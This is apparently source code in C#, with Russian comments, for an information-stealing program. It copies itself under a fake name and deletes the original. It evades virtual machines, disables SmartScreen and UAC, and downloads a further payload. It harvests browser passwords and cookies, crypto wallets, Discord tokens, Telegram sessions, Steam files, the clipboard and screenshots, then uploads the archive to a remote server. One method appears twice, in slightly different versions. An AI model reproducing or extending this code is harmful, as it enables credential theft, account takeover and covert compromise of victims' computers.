private static bool GeName(string path)
{
using (var rnd = new RNGCryptoServiceProvider())
{
try
{
foreach (string i in FakeName.OrderBy(x => GetNextInt32(rnd)).ToArray())
{
RandomProcessName = CombineEx.Combination(path, i);
break;
}
CombineEx.FileCopy(GlobalPath.AssemblyPath, RandomProcessName, false); // Перемещает запускаемый файл!
ProcessKiller.Running(RandomProcessName, false);
ProcessKiller.Delete("/C choice /C Y /N /D Y /T 0 & Del", GlobalPath.AssemblyPath);
}
catch { return(false); }
return(true);
}
}
private static bool GeName(string path)
{
using (var rnd = new RNGCryptoServiceProvider())
{
try
{
foreach (string style in FakeName.OrderBy(x => GetNextInt32(rnd)).ToArray()) // генерируем рандомное имя из списка FakeName
{
RandomProcessName = CombineEx.Combination(path, style); // Задаём сгенерированное имя для нового файла .exe
break; // Выбрали первое подходящие, выходим из цикла.
}
CombineEx.FileCopy(GlobalPath.AssemblyPath, RandomProcessName, false); // Копируем запускаемый файл в новую папку
ProcessKiller.Running(RandomProcessName, false); // Запускаем файл из новой папки
ProcessKiller.Delete("/C choice /C Y /N /D Y /T 0 & Del", GlobalPath.AssemblyPath); // Удаляем предыдущий процесс
}
catch { return(false); }
return(true);
}
}
private void Updater_Load(object sender, EventArgs e)
{
if (Date.Delay)
{
Thread.Sleep(Date.DelaySec);
}
if (!AntiVM.GetCheckVMBot())
{
if (!MovEx.CheckPath())
{
if (Date.Delay)
{
ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath);
}
}
else
{
HideFolders.Enabled(0);
DisableLockers.SmartScreen();
DisableLockers.UAC();
AntiSniffer.Inizialize();
if (Date.Downloader || Date.AdminRight)
{
Users.DownFileEx(Date.DownloaderLink, Environment.GetEnvironmentVariable(Date.DownloaderPath), Date.FakeNameProcess);
}
if (Date.IpLogger)
{
IPLogger.Sender(Date.IpLoggerLink);
}
if (Date.InfoGrabber)
{
InfoGrabber.CreateTable(GlobalPath.PC_File);
}
if (Date.CryptoWall)
{
BitBoard.GetWallet();
}
if (Date.Browsers)
{
ChromeSearcher.CopyLoginsInSafeDir(GlobalPath.Logins);
ChromeCookiesSearcher.CopyCookiesInSafeDir(GlobalPath.Cookies);
GetPassword.Inizialize();
GetCookies.Inizialize();
}
if (Date.Buffer)
{
ClipboardEx.GetBuffer(GlobalPath.Buffer);
}
if (Date.Programs)
{
MailFoxPassword.Inizialize();
DcGrabber.GeTokens();
TGrabber.GetTelegramSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
}
if (Date.Clients)
{
GetClients.Inizialize();
}
if (Date.Steam)
{
GetSteamFiles.Copy("*.", "*.vdf", "config", "Steam");
}
if (Date.ScreenShot)
{
ScreenShot.Shoot(GlobalPath.Screen);
}
Ccleaner.CheckIsNullDirsAndFiles(GlobalPath.GarbageTemp);
Archiving.Inizialize();
UploadZip.Inizialize(GlobalPath.Reception, "POST", GlobalPath.ZipAdd);
//BlockIE.Enabled(1); // Блокировка интернета
if (Date.Delay)
{
ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath);
}
Application.Exit();
}
}
else
{
SaveData.SaveFile("VM_Detect.txt", "The program is not supported on virtual machines!");
if (Date.Delay)
{
ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath);
}
}
}